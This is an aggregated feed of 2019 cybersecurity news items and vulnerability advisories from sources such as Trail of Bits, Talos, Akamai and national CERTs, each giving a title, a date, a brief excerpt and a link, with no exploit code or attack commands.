From The Depths Of Counterfeit Smartphones
2019-08-07T10:50:51Z | 1565175051

In an age of online second-hand retailers, marketplace exchanges, and third-party refurb shops, it’s easier than ever to save hundreds of dollars when buying a phone. These channels provide an appealing alternative for people foregoing a retail shopping experience for a hefty discount. However, there is an additional option for those bargain hunters seeking even […]

https://blog.trailofbits.com/2019/08/07/from-the-depths-of-counterfeit-smartphones/
Better Encrypted Group Chat
2019-08-06T10:50:24Z | 1565088624

Broadly, an end-to-end encrypted messaging protocol is one that ensures that only the participants in a conversation, and no intermediate servers, routers, or relay systems, can read and write messages. An end-to-end encrypted group messaging protocol is one that ensures this for all participants in a conversation of three or more people. End-to-end encrypted group […]

https://blog.trailofbits.com/2019/08/06/better-encrypted-group-chat/
MongoDB Server session reuse vulnerability
2019-08-06T00:00:00Z | 1565049600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0829
NVIDIA NVWGF2UMX_CFG.DLL shader functionality code execution vulnerability
2019-08-05T00:00:00Z | 1564963200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0779
NVIDIA NVWGF2UMX_CFG.DLL Shader functionality DCL_INDEXABLETEMP code execution vulnerability
2019-08-05T00:00:00Z | 1564963200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0812
VMware Workstation 15 pixel shader functionality denial of service vulnerability
2019-08-05T00:00:00Z | 1564963200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0757
NVIDIA NVWGF2UMX_CFG.DLL Shader functionality DCL_INDEXABLETEMP code execution vulnerability
2019-08-05T00:00:00Z | 1564963200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0813
Crytic: Continuous Assurance for Smart Contracts
2019-08-02T10:50:36Z | 1564743036

Note: This blog has been reposted from Truffle Suite’s blog. We are proud to announce our new smart contract security product: https://crytic.io/. Crytic provides continuous assurance for smart contracts. The platform reports build status on every commit and runs a suite of security analyses for immediate feedback. The beta will be open soon. Follow us […]

https://blog.trailofbits.com/2019/08/02/crytic-continuous-assurance-for-smart-contracts/
FIRST announces winner of The Incident Response Hall of Fame
2019-07-31T00:00:00Z | 1564531200

Prof. Dr. Klaus-Peter Kossakowski honored as the inaugural inductee of The Incident Response Hall of Fame

https://www.first.org/newsroom/releases/20190731
Diversity of Thought in Tech
2019-07-30T04:00:00Z | 1564459200

At Akamai, we believe innovation is only possible when the various viewpoints and experiences of a collective, culminate to make a great idea. It is the variety of these ideas which is important. Why does diversity of thought matter? When...

https://www.akamai.com/blog/culture/diversity-of-thought-in-tech
Yara Object Lookup Denial of Service Vulnerability
2019-07-30T00:00:00Z | 1564444800

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0781
Exploited vulnerabilities turned the cyber weather cloudy in May
2019-07-29T14:20:16Z | 1564410016

Scams targeted especially at those working in payroll peaked in May. Hackers targeted publicly available online services that are not appropriately updated. The BlueKeep vulnerability raised concerns about a possible fast-spreading malware outbreak.

https://www.kyberturvallisuuskeskus.fi/en/news/exploited-vulnerabilities-turned-cyber-weather-cloudy-may
Exploited vulnerabilities turned the cyber weather cloudy in May
2019-07-29T14:20:16Z | 1564410016

Scams targeted especially at those working in payroll peaked in May. Hackers targeted publicly available online services that are not appropriately updated. The BlueKeep vulnerability raised concerns about a possible fast-spreading malware outbreak.

https://www.kyberturvallisuuskeskus.fi/en/news/exploited-vulnerabilities-turned-cyber-weather-cloudy-may
Increase in invoice fraud over the summer
2019-07-29T14:14:57Z | 1564409697

In addition to invoice fraud, cyber spying was a hot topic in June. In Finland, the city of Lahti was hit by a cyber-attack, which affected city's online services widely. In terms of DoS attacks, June was quiet.

https://www.kyberturvallisuuskeskus.fi/en/news/increase-invoice-fraud-over-summer
Increase in invoice fraud over the summer
2019-07-29T14:14:57Z | 1564409697

In addition to invoice fraud, cyber spying was a hot topic in June. In Finland, the city of Lahti was hit by a cyber-attack, which affected city's online services widely. In terms of DoS attacks, June was quiet.

https://www.kyberturvallisuuskeskus.fi/en/news/increase-invoice-fraud-over-summer
Criminals Using Targeted Remote File Inclusion Attacks in Phishing Campaigns
2019-07-29T04:00:00Z | 1564372800

In June 2019, logs on my personal website recorded markers that were clearly Remote File Inclusion (RFI) vulnerability attempts. The investigation into the attempts uncovered a campaign of targeted RFI attacks that currently are being leveraged to deploy phishing kits....

https://www.akamai.com/blog/security/criminals-using-targeted-remote-file-inclusion-attacks-in-phishing-campaigns
SDL_image XPM image color code code execution vulnerability
2019-07-29T00:00:00Z | 1564358400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0843
SDL_image XCF Image Code Execution Vulnerability
2019-07-29T00:00:00Z | 1564358400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0842
SDL_image XPM image colorhash parsing Code Execution Vulnerability
2019-07-29T00:00:00Z | 1564358400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0844
SDL_image PCX Image Code execution Vulnerability
2019-07-29T00:00:00Z | 1564358400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0841
Making a Strategic Plan for the Future of Networking
2019-07-28T10:38:15Z | 1564310295

Many enterprise networks are straining under the pressure of massive changes brought on by computing trends that are shifting traditional traffic patterns as well as by digital transformations of the underlying business. Companies are shifting workloads to the cloud, increasing their use of voice and video applications, and adding thousands or even millions of new... The post Making a Strategic Plan for the Future of Networking appeared first on Cato Networks.

https://www.catonetworks.com/blog/making-a-strategic-plan-for-the-future-of-networking/
Alert for vulnerability in Exim email server removed
2019-07-25T06:43:11Z | 1564036991

We removed the alert for a vulnerability in Exim email servers as the NCSC-FI has received no new reports about any successful exploitations of the vulnerability in over a month.

https://www.kyberturvallisuuskeskus.fi/en/news/alert-vulnerability-exim-email-server-removed
Alert for vulnerability in Exim email server removed
2019-07-25T06:43:11Z | 1564036991

We removed the alert for a vulnerability in Exim email servers as the NCSC-FI has received no new reports about any successful exploitations of the vulnerability in over a month.

https://www.kyberturvallisuuskeskus.fi/en/news/alert-vulnerability-exim-email-server-removed
Uuenes küberintsidendist teavitamise vorm
2019-07-25T06:42:51Z | 1564036971

RIA intsidentide lahendamise osakond CERT-EE uuendas küberjuhtumitest teavitamise vormi, et intsidentidest teada andmine oleks mugavam ja kiirem.

https://ria.ee/uudised/uuenes-kuberintsidendist-teavitamise-vorm
Security Alert (A19-07-05): Multiple Vulnerabilities in Apple iOS
2019-07-23T04:00:00Z | 1563854400

Apple has released a security update in its latest iOS version 12.4 to fix 36 vulnerabilities identified in various iOS devices.

https://www.govcert.gov.hk/en/alerts_detail.php
Uuendatud DigiDoc4 toetab vaegnägijatele mõeldud ekraanilugereid
2019-07-22T14:11:28Z | 1563804688

RIA uuendas ID-kaardi tarkvara ning DigiDoc4 värske versioon (4.2.2) toetab ekraanilugeritega peamiste funktsioonide kasutamist.

https://ria.ee/uudised/uuendatud-digidoc4-toetab-vaegnagijatele-moeldud-ekraanilugereid
In Conversation: It's Never Too Late
2019-07-20T04:00:00Z | 1563595200

There can be barriers to pursuing a career in tech. For many people, the journey isn't straightforward. Many of our Akamai employees have diverse backgrounds and have overcome obstacles to pursue their dream career. Often, the way forward into a...

https://www.akamai.com/blog/culture/in-conversation-its-never-too-late
Understanding Docker container escapes
2019-07-20T01:01:09Z | 1563584469

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes. Quick and dirty way to get out of a privileged k8s […]

https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
SonicWall Firewall - Management Vulnerabilities
2019-07-19T20:00:00Z | 1563566400

SonicWall physical firewall appliances running certain versions of SonicOS contain vulnerabilities in code utilized for remote management. At this time, there is no indication that the discovered vulnerabilities are being exploited in the wild, however:SonicWall STRONGLY advises to apply the SonicOS patch immediately.IF you cannot update immediately, as a mitigation please restrict SonicWall management access (HTTPS/HTTP/SSH) to trusted sources and/or disable management access from untrusted Internet sources, then apply the SonicOS patch as soon as possible.Note:  SonicWall will communicate future updates via this Security Advisory and SonicWall PSIRT Advisory SNWLID-2019-0009 CVE: CVE-2019-12255,CVE-2019-12256,CVE-2019-12257,CVE-2019-12258,CVE-2019-12259,CVE-2019-12260,CVE-2019-12261,CVE-2019-12262,CVE-2019-12263,CVE-2019-12264,CVE-2019-12265 Last updated: July 19, 2019, 8 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0009
Security Alert (A19-07-04): Vulnerability in Drupal
2019-07-18T04:00:00Z | 1563422400

Drupal released security update to fix the vulnerability in the Workspaces module which are included in the Drupal core.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-07-03): Multiple Vulnerabilities in Oracle Java and Oracle Products (July 2019)
2019-07-17T04:00:00Z | 1563336000

Oracle has released Critical Patch Update (CPU) Advisory with collections of patches for multiple security vulnerabilities found in Java SE and various Oracle products.

https://www.govcert.gov.hk/en/alerts_detail.php
Trail of Bits Named in Forrester Wave as a Leader in Midsize Cybersecurity Consulting Services
2019-07-16T15:20:19Z | 1563290419

Trail of Bits was among the select companies that Forrester invited to participate in its recent report, The Forrester Wave™: Midsize Cybersecurity Consulting Services, Q2 2019. In this evaluation, Trail of Bits was cited as a Leader. We received the highest score among all participants in the current offering category, among the highest scores in […]

https://blog.trailofbits.com/2019/07/16/trail-of-bits-named-in-forrester-wave-as-a-leader-in-midsize-cybersecurity-consulting-services/
SD-WAN Services: Forget Burger King, Just Manage It Your Way
2019-07-16T14:34:02Z | 1563287642

The old Burger King jingle came to mind when thinking about today’s introduction of Cato Hands-free Management for our global managed SD-WAN Service. Hold the pickles or the lettuce — it doesn’t much matter; Burger King gave you the burger the way you like it. And that’s certainly true with how we let you manage your network. Unlike a traditional telco, Cato has always let customers run their networks or, if they, preferred to share some... The post SD-WAN Services: Forget Burger King, Just Manage It Your Way appeared first on Cato Networks.

https://www.catonetworks.com/blog/sd-wan-services-forget-burger-king-just-manage-it-your-way/
Cracking my windshield and earning $10,000 on the Tesla Bug Bounty Program
2019-07-14T00:00:00Z | 1563062400

One of the more interesting things I've had the opportunity to hack on is the Tesla Model 3. It has a built in web browser, free premium LTE, and over-the-air software updates. It's a network connected computer on wheels that drives really fast.

https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program
FIRST publishes updated Common Vulnerability Scoring System for worldwide security teams
2019-07-12T13:00:00Z | 1562936400

July 12th, 2019 - The Forum of Incident Response and Security Teams (FIRST) has published an update of its internationally recognized Common Vulnerability Scoring System (CVSS). CVSS is a common scoring system designed to provide open and universally standard severity ratings of software vulnerabilities for the security community. Used by organizations worldwide, version 3.1 documentation is now available on the FIRST website for members and non-members to reference.

https://www.first.org/newsroom/releases/20190712
On LibraBFT’s use of broadcasts
2019-07-12T10:50:24Z | 1562928624

LibraBFT is the Byzantine Fault Tolerant (BFT) consensus algorithm used by the recently released Libra cryptocurrency. LibraBFT is based on another BFT consensus algorithm called HotStuff. While some have noted the similarities between the two algorithms, they differ in some crucial respects. In this post we highlight one such difference: in LibraBFT, non-leaders perform broadcasts. […]

https://blog.trailofbits.com/2019/07/12/librabft/
Veebis pääses ligi vähemalt 34 000 kasutaja ning 100 000 tehingu andmetele
2019-07-11T14:40:46Z | 1562856046

Sel ja eelmisel nädalal teatasid kaks ettevõtet ja üks omavalitsus Riigi Infosüsteemi Ametit (RIAle), et nende andmed ja tehingud olid internetis avalikud ja neile oli võimalik ligi pääseda. Kokku olid veebis kättesaadavad vähemalt 34 000 inimese ja 100 000 tehingu andmed.

https://ria.ee/uudised/veebis-paases-ligi-vahemalt-34-000-kasutaja-ning-100-000-tehingu-andmetele
Pykspa v2 DGA updated to become selective
2019-07-11T04:00:00Z | 1562817600

Additional research and information provided by Asaf Nadler Recent changes to the Pykspa v2 domain generation algorithm (DGA) have made it more selective. Akamai researchers have tracked these changes and believe that part of the reason for selective domain generation...

https://www.akamai.com/blog/security/pykspa-v2-dga-updated-to-become-selective
Kurjategijatel on raskem tagaselja Smart-ID kontosid luua
2019-07-10T07:29:25Z | 1562743765

Riigi Infosüsteemi Amet (RIA) tegi Smart-ID teenust pakkuvale SK ID Solutionsile (SK) ettepanekud, kuidas paremini ära hoida Smart-ID kontode loomist kurjategijate poolt. Kokku loodi inimestele nende teadmata mitukümmend Smart-ID kontot ning paaril juhul kaotati ka raha.

https://ria.ee/uudised/kurjategijatel-raskem-tagaselja-smart-id-kontosid-luua
High Threat Security Alert (A19-07-01): Multiple Vulnerabilities in Microsoft Products (July 2019)
2019-07-10T04:00:00Z | 1562731200

Microsoft has released security updates addressing multiple vulnerabilities and which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A19-07-02): Multiple Vulnerabilities in Firefox
2019-07-10T04:00:00Z | 1562731200

Mozilla has published security advisories to address multiple vulnerabilities found in Firefox. Reports indicate that the vulnerabilities allow an attacker to run arbitrary code.

https://www.govcert.gov.hk/en/alerts_detail.php
Seriously, stop using RSA
2019-07-08T10:50:43Z | 1562583043

Here at Trail of Bits we review a lot of code. From major open source projects to exciting new proprietary software, we’ve seen it all. But one common denominator in all of these systems is that for some inexplicable reason people still seem to think RSA is a good cryptosystem to use. Let me save […]

https://blog.trailofbits.com/2019/07/08/fuck-rsa/
WEBCHECK.PT já se encontra disponível
2019-07-08T00:00:00Z | 1562544000

Esta plataforma permite que qualquer cidadão ou entidade verifique, em tempo real, o nível de conformidade de um domínio de internet e de correio eletrónico com os mais recentes standards para a comunicação segura entre sistemas, facilitando a identificação das medidas técnicas necessárias que asseguram uma maior resiliência e segurança da presença e comunicação online. A WEBCHECK.PT disponibiliza ainda um conjunto de normas técnicas e tutoriais que visam auxiliar a implementação dos principais standards de segurança avaliados. Aceda a WEBCHECK.PT, garanta a conformidade do seu domínio, e contribua para um ciberespaço nacional mais seguro!

https://dyn.cncs.gov.pt/pt/detalhe/art/531/webcheckpt-ja-se-encontra-disponivel
NSX-T vs. NSX-V ? Key Differences and Pitfalls to Avoid
2019-07-07T15:57:00Z | 1562515020

Learn the difference between VMware?s segmentation offerings, NSX-T vs NSX-V, and understand the several potential pitfalls that are important to consider before deployment.

https://www.akamai.com/blog/security/nsx-t-vs-nsx-v-key-differences-and-pitfalls-to-avoid
Inquérito sobre profissionais de cibersegurança e segurança da informação está disponível a partir de hoje
2019-07-05T00:00:00Z | 1562284800

A Associação Portuguesa para a Promoção da Segurança da Informação (AP2SI), com o apoio do CNCS, no âmbito do Observatório de Cibersegurança - plataforma de análise e sistematização de conhecimento sobre temas multidisciplinares da cibersegurança - está a realizar um inquérito que visa conhecer melhor os profissionais de cibersegurança e segurança da informação em Portugal.Um dos objetivos é construir um perfil deste profissional, identificando características, tais como qualificações, principais funções desempenhadas, nível remuneratório ou motivos pelos quais se mantém no mesmo emprego, entre outros.Se é um desses profissionais, convidamo-lo a participar no questionário aqui e a partilhá-lo.Os resultados serão divulgados durante o mês de outubro, numa iniciativa integrada no Mês Europeu da Cibersegurança.

https://dyn.cncs.gov.pt/pt/detalhe/art/530/inquerito-sobre-profissionais-de-ciberseguranca-e-seguranca-da-informacao-esta-disponivel-a-partir-de-hoje
Avoiding Smart Contract “Gridlock” with Slither
2019-07-03T18:42:53Z | 1562179373

A denial-of-service (DoS) vulnerability, dubbed ‘Gridlock,’ was publicly reported on July 1st in one of Edgeware’s smart contracts deployed on Ethereum. As much as $900 million worth of Ether may have been processed by this contract. Edgeware has since acknowledged and fixed the “fatal bug.” When we heard about Gridlock, we ran Slither on the […]

https://blog.trailofbits.com/2019/07/03/avoiding-smart-contract-gridlock-with-slither/
State of the Art Proof-of-Work: RandomX
2019-07-02T10:50:11Z | 1562064611

RandomX is a new ASIC and GPU-resistant proof-of-work (PoW) algorithm originally developed for Monero, but potentially useful in any blockchain using PoW that wants to bias towards general purpose CPUs. Trail of Bits was contracted by Arweave to review this novel algorithm in a two person-week engagement and provide guidance on alternate parameter selection. But […]

https://blog.trailofbits.com/2019/07/02/state/
Simple DirectMedia Layer SDL2_image IMG_LoadPCX_RW code execution vulnerability
2019-07-02T00:00:00Z | 1562025600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0820
Simple DirectMedia Layer SDL2_image IMG_LoadPCX_RW signed comparison code execution vulnerability
2019-07-02T00:00:00Z | 1562025600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0821
Siderophile: Expose your Crate’s Unsafety
2019-07-01T15:30:06Z | 1561995006

Today we released a tool, siderophile, that helps Rust developers find fuzzing targets in their codebases. Siderophile trawls your crate’s dependencies and attempts to finds every unsafe function, expression, trait method, etc. It then traces these up the callgraph until it finds the function in your crate that uses the unsafety. It ranks the functions […]

https://blog.trailofbits.com/2019/07/01/siderophile-expose-your-crates-unsafety/
Google V8 Array.prototype Memory Corruption Vulnerability
2019-07-01T00:00:00Z | 1561939200

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0791
Vulnerabilities in Mirasys VMS video management solution
2019-06-28T08:00:57Z | 1561708857

Three different vulnerabilities has been discovered in Mirasys VMS systems. An attacker abusing these vulnerabilities might obtain confidential information or execute malicious code in the target system. Mirasys has released new version of the VMS software that fix the vulnerabilities.

https://www.kyberturvallisuuskeskus.fi/en/vulnerabilities-mirasys-vms-video-management-solution
Use constexpr for faster, smaller, and safer code
2019-06-27T10:50:06Z | 1561632606

With the release of C++14, the standards committee strengthened one of the coolest modern features of C++: constexpr. Now, C++ developers can write constant expressions and force their evaluation at compile-time, rather than at every invocation by users. This results in faster execution, smaller executables and, surprisingly, safer code. Undefined behavior has been the source […]

https://blog.trailofbits.com/2019/06/27/use-constexpr-for-faster-smaller-and-safer-code/
Panicking the right way in Go
2019-06-26T10:50:58Z | 1561546258

A common Go idiom is to (1) panic, (2) recover from the panic in a deferred function, and (3) continue on. In general, this is okay, so long there are no global state changes between the entry point to the function calling defer, and the point at which the panic occurs. Such global state changes […]

https://blog.trailofbits.com/2019/06/26/panicking-the-right-way-in-go/
SIRT Advisory: Silexbot Bricking Systems With Known Default Login Credentials
2019-06-26T04:00:00Z | 1561521600

On June 25th, I discovered a new bot named Silexbot on my honeypot. The bot itself is a blunt tool used to destroy IoT devices. Its author, someone who claims to be a 14-year-old boy from Europe, has made his...

https://www.akamai.com/blog/security/sirt-advisory-silexbot-bricking-systems-with-known-default-login-credentials
Recomendação Técnica - SPF, DKIM e DMARC
2019-06-26T00:00:00Z | 1561507200

O serviço de correio eletrónico continua a ser um dos serviços internet mais utilizados nos contextos de uso pessoal, institucional e empresarial. No entanto, é utilizado de forma abusiva diariamente, por exemplo, para envio de mensagens com remetente forjado, técnica comummente utilizada em esquemas de furto de identidade, burla informática e ciberespionagem.Para fazer face a estes e outros problemas, a indústria, através do Internet Engineering Task Force (IETF), tem vindo a promover a adoção de um conjunto de standards com vista a melhorar a segurança do serviço de correio eletrónico, de entre os quais se destacam o Sender Policy Framework (SPF), o DomaimKeys Identified Mail (DKIM) e o Domain-based Message Authentication, Reporting and Conformance (DMARC).Tendo em conta a arquitetura distribuída da internet, o sucesso destas iniciativas não depende apenas do Utilizador, mas das respetivas taxas de adoção e do exemplo fornecido quer pela indústria, quer pelos estados. Nesse sentido, o CNCS recomenda e promove, através da Recomendação Técnica 01/2019 agora publicada, a adoção dos standards referidos a todas as organizações nacionais, públicas e privadas, com presença na internet, ao nível da configuração do(s) respetivo(s) domínio(s) de correio eletrónico,O documento encontra-se disponível através da seguinte ligação.

https://dyn.cncs.gov.pt/pt/detalhe/art/528/recomendacao-tecnica-spf-dkim-e-dmarc
O Quadro Nacional de Referência para a Cibersegurança já se encontra disponível
2019-06-26T00:00:00Z | 1561507200

O documento reflete a realidade organizacional portuguesa, respondendo à necessidade de implementar medidas contra ameaças que colocam em causa a segurança do ciberespaço. Este documento faz um conjunto de recomendações para que as organizações possam definir uma estratégia que envolva toda a sua estrutura. As entidades podem aderir de forma voluntária e beneficiar de uma abordagem homogénea que promove uma resposta nacional às ciberameaças.Consulte aqui o documento e envolva a sua organização neste processo de capacitação nacional.

https://dyn.cncs.gov.pt/pt/detalhe/art/529/o-quadro-nacional-de-referencia-para-a-ciberseguranca-ja-se-encontra-disponivel
Creating an LLVM Sanitizer from Hopes and Dreams
2019-06-25T10:50:21Z | 1561459821

Each year, Trail of Bits runs a month-long winter internship aka “winternship” program. This year we were happy to host 4 winterns who contributed to 3 projects. This project comes from Carson Harmon, a new graduate from Purdue interested in compilers and systems engineering, and a new full-time member of our research practice. I set […]

https://blog.trailofbits.com/2019/06/25/creating-an-llvm-sanitizer-from-hopes-and-dreams/
Mirai Malware Targeting the Enterprise
2019-06-24T06:08:03Z | 1561356483

Mirai is back with a vengeance. The infamous malware that crippled global DNS provider Dyn, French Web host OVH and security journalist Brain Kreb’s Web site with botnets of infected home routers, baby monitors and other IoT devices is now infecting enterprise network equipment, according to a recent Palo Alto Networks blog and Network Computing... The post Mirai Malware Targeting the Enterprise appeared first on Cato Networks.

https://www.catonetworks.com/blog/mirai-malware-targeting-the-enterprise/
Security Alert (A19-06-09): Vulnerability in Dell SupportAssist
2019-06-24T04:00:00Z | 1561348800

Dell released a security update to address a vulnerability in the PC Doctor component of the Dell SupportAssist software.

https://www.govcert.gov.hk/en/alerts_detail.php
In Conversation: Career Development as a Parent
2019-06-23T04:00:00Z | 1561262400

Technology can only continue to thrive with the direct influence of those involved in its evolution. When the experiences of those people are broad, the tech industry benefits from the diversity of what they bring to the table. At Akamai,...

https://www.akamai.com/blog/culture/in-conversation-career-development-as-a-parent
High Threat Security Alert (A19-06-06): Vulnerability in Firefox
2019-06-21T04:00:00Z | 1561089600

Mozilla has published a security advisory to address the vulnerability found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-06-07): Vulnerability in ISC BIND
2019-06-21T04:00:00Z | 1561089600

A vulnerability was found in the ISC BIND software.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-06-08): Vulnerability in Apache Tomcat
2019-06-21T04:00:00Z | 1561089600

Apache Software Foundation has released new versions of Apache Tomcat 8 and 9 to address a vulnerability in HTTP/2.

https://www.govcert.gov.hk/en/alerts_detail.php
Getting 2FA Right in 2019
2019-06-20T10:50:12Z | 1561027812

Since March, Trail of Bits has been working with the Python Software Foundation to add two-factor authentication (2FA) to Warehouse, the codebase that powers PyPI. As of today, PyPI members can enable time-based OTP (TOTP) and WebAuthn (currently in beta). If you have an account on PyPI, go enable your preferred 2FA method before you […]

https://blog.trailofbits.com/2019/06/20/getting-2fa-right-in-2019/
Trail of Bits @ ICSE 2019 – Recap
2019-06-19T14:35:13Z | 1560954913

Three weeks ago, we presented our work on Slither at WETSEB, an ICSE workshop. ICSE is a top-tier academic conference, focused on software engineering. This edition of the event went very well. The organizers do their best to attract and engage industrials to the discussions. The conference had many talks in parallel. We wish we […]

https://blog.trailofbits.com/2019/06/19/trail-of-bits-icse-2019-recap/
Information security in 2018 draws lessons from cyber security incidents and looks ahead
2019-06-19T08:16:49Z | 1560932209

Our annual review cuts across the cyber security world in 2018 from a Finnish point of view. What were the key lessons from our information security assessments for building information-secure environments? How is the cooperation with critical infrastructure providers? The review summarises the most significant information security phenomena and incidents of the year that can provide valuable lessons for risk assessments and future contingency plans.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2018-draws-lessons-cyber-security-incidents-and-looks-ahead
Information security in 2018 draws lessons from cyber security incidents and looks ahead
2019-06-19T08:16:49Z | 1560932209

Our annual review cuts across the cyber security world in 2018 from a Finnish point of view. What were the key lessons from our information security assessments for building information-secure environments? How is the cooperation with critical infrastructure providers? The review summarises the most significant information security phenomena and incidents of the year that can provide valuable lessons for risk assessments and future contingency plans.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-2018-draws-lessons-cyber-security-incidents-and-looks-ahead
High Threat Security Alert (A19-06-04): Vulnerability in Firefox
2019-06-19T04:00:00Z | 1560916800

Mozilla has published a security advisory to address the vulnerability found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A19-06-05): Vulnerability in Oracle WebLogic Server
2019-06-19T04:00:00Z | 1560916800

Oracle has released an urgent patch to address a remote code execution vulnerability in Oracle WebLogic Server.

https://www.govcert.gov.hk/en/alerts_detail.php
Enhancing video streaming quality for ExoPlayer - Part 1: Quality of User Experience Metrics
2019-06-19T04:00:00Z | 1560916800

The online video player landscape is fragmented with a wide variety of players across a mix of popular platforms. In the world of HTML5-video players in browsers, there are a number of open-source solutions (e.g., hls.js, dash.js, Shaka Player), as well as commercial offerings which include Akamai's AMP.

https://www.akamai.com/blog/performance/enhancing-video-streaming-quality-for-exoplayer-part-1-quality-of-user-experience-metrics
Why you should go to QueryCon this week
2019-06-18T10:50:09Z | 1560855009

QueryCon takes place this week at the Convene Conference Center in Downtown Manhattan, Thursday June 20th- Friday June 21st. If you don’t have a ticket yet, get one while you can. QueryCon is an annual conference about osquery, the open source project that’s helping many top tech companies manage their endpoints. We’ve been big fans […]

https://blog.trailofbits.com/2019/06/18/why-you-should-go-to-querycon-this-week/
TCP SACK Panic - Linux Kernel Vulnerability
2019-06-18T00:00:00Z | 1560816000

Jonathan Looney discovered that the Linux kernel default MSS is hard-coded to 48 bytes. This allows a remote peer to fragment TCP resend queues significantly more than if a larger MSS were enforced. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commits 967c05aee439e6e5d7d805e195b3a20ef5c433d6 and 5f3e2bf008c2221478101ee72f5cb4654b9fc363. CVE: CVE-2019-11479 Last updated: June 20, 2019, midnight

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0008
TCP SACK Panic - Linux Kernel Vulnerability
2019-06-18T00:00:00Z | 1560816000

Jonathan Looney discovered that the TCP retransmission queue implementation in tcp_fragment in the Linux kernel could be fragmented when handling certain TCP Selective Acknowledgment (SACK) sequences. A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit f070ef2ac66716357066b683fb0baf55f8191a2e. CVE: CVE-2019-11478 Last updated: June 20, 2019, midnight

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0007
TCP SACK Panic - Linux Kernel Vulnerability
2019-06-18T00:00:00Z | 1560816000

Jonathan Looney discovered that the TCP_SKB_CB(skb)->tcp_gso_segs value was subject to an integer overflow in the Linux kernel when handling TCP Selective Acknowledgments (SACKs). A remote attacker could use this to cause a denial of service. This has been fixed in stable kernel releases 4.4.182, 4.9.182, 4.14.127, 4.19.52, 5.1.11, and is fixed in commit 3b4929f65b0d8249f19a50245cd88ed1a2f78cff. CVE: CVE-2019-11477 Last updated: June 20, 2019, midnight

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0006
Leaves of Hash
2019-06-17T10:50:58Z | 1560768658

Trail of Bits has released Indurative, a cryptographic library that enables authentication of a wide variety of data structures without requiring users to write much code. Indurative is useful for everything from data integrity to trustless distributed systems. For instance, developers can use Indurative to add Binary Transparency to a package manager — so users […]

https://blog.trailofbits.com/2019/06/17/leaves-of-hash/
Over 1,100 delegates set to attend world-renowned information security conference in Edinburgh
2019-06-17T09:30:00Z | 1560763800

Forum of Incident Response and Security Teams 31st Annual Conference opens today at Edinburgh International Conference Centre

https://www.first.org/newsroom/releases/20190617
Deep dive into the Cato SASE Cloud
2019-06-17T08:32:17Z | 1560760337

The post Deep dive into the Cato SASE Cloud appeared first on Cato Networks.

https://www.catonetworks.com/resources/deep-dive-into-the-cato-cloud/
Secure and Optimized SD-WAN
2019-06-17T08:27:07Z | 1560760027

The post Secure and Optimized SD-WAN appeared first on Cato Networks.

https://www.catonetworks.com/resources/secure-and-optimized-sd-wan/
SD-WAN Use Cases and Success Stories
2019-06-17T08:14:12Z | 1560759252

The post SD-WAN Use Cases and Success Stories appeared first on Cato Networks.

https://www.catonetworks.com/resources/sd-wan-use-cases-and-success-stories/
KCodes NetUSB unauthenticated remote kernel information disclosure vulnerability
2019-06-17T00:00:00Z | 1560729600

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0776
CloudTest Vulnerability (CVE-2019-11011)
2019-06-16T04:00:00Z | 1560657600

https://www.akamai.com/blog/security/cloudtest-vulnerability-cve-2019-11011
KCodes NetUSB unauthenticated remote kernel arbitrary memory read vulnerability
2019-06-14T00:00:00Z | 1560470400

https://talosintelligence.com/vulnerability_reports/TALOS-2019-0775
Latest ECHOBOT: 26 Infection Vectors
2019-06-13T04:00:00Z | 1560398400

Introduction Since the release of the Mirai source code in October of 2016, there have been hundreds of variants. While publishing my own research, I noticed that Palo Alto Networks was also examining similar samples, and published their findings. Earlier...

https://www.akamai.com/blog/security/latest-echobot-26-infection-vectors
Security Alert (A19-06-01): Multiple Vulnerabilities in Microsoft Products (June 2019)
2019-06-12T04:00:00Z | 1560312000

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-06-02): Vulnerability in Adobe Flash Player
2019-06-12T04:00:00Z | 1560312000

Security updates are released for Adobe Flash Player to address the vulnerability.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A19-06-03): Vulnerability in Firefox
2019-06-12T04:00:00Z | 1560312000

Mozilla has published a security advisory to address the vulnerability found in Firefox.

https://www.govcert.gov.hk/en/alerts_detail.php
Catch Me If You Can: Evasive and Defensive Techniques in Phishing
2019-06-12T04:00:00Z | 1560312000

Phishing is a multifaceted type of attack, aimed at collecting usernames and passwords, personal information, or sometimes both. Yet, these attacks only work so long as the phishing kit itself remains hidden. Phishing is a numbers game and time is...

